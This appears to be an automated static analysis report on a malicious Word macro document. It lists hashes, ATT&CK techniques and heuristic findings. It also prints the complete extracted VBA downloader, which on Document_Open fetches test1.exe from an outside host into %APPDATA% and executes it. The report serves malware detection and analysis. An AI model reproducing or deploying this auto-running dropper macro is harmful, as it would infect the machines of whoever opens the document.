Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3e50b899730390f1…

MALICIOUS

Office (OOXML)

15.2 KB Created: 2015-12-28 22:54:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2021-06-04
MD5: dea628bb78f84b1f1ebf26bcb7fecb87 SHA-1: 30acede2fa88bc197d22fe3c555756b73b054555 SHA-256: 3e50b899730390f107046fa6ac7d0a0a6e097c5a10bd3d1af83fc262f661ba0b
98 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1203 Exploitation for Client Execution

The sample contains a VBA macro with a Document_Open auto-execution subroutine. This macro utilizes URLDownloadToFileW to download a second-stage executable from http://firefly.fireflyproduce.xyz/install/data/test1.exe and saves it as %APPDATA%\test.exe. Subsequently, it uses ShellExecuteW to execute the downloaded file, indicating a downloader or dropper functionality.

Heuristics 5

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    'Macro Name: wWefqPnB
    Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long
    Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_Open()
    wWefqPnB
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe"
    kQscOcjq = Environ("APPDATA") & "\test.exe"
    Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://firefly.fireflyproduce.xyz/install/data/test1.exe Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1199 bytes
SHA-256: c11e1f769b88ac2f702fc508ab8ce0d53da5570766c75d2948271c0e0d8f1e2b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
wWefqPnB
End Sub

Attribute VB_Name = "Module1"
Option Explicit
'Macro Name: wWefqPnB
Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long
Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long
Public Sub wWefqPnB()
Dim FVKIBHsz As String, kQscOcjq As String
FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe"
kQscOcjq = Environ("APPDATA") & "\test.exe"
Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0)
Call ULPlGsEh(0, StrPtr("Open"), StrPtr(kQscOcjq), 0, 0, 1)
End Sub
Private Sub Document_Open()
wWefqPnB
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: 551affe3abb05c04429907bb3cd926889084a4f97c75446f5471118565d366ac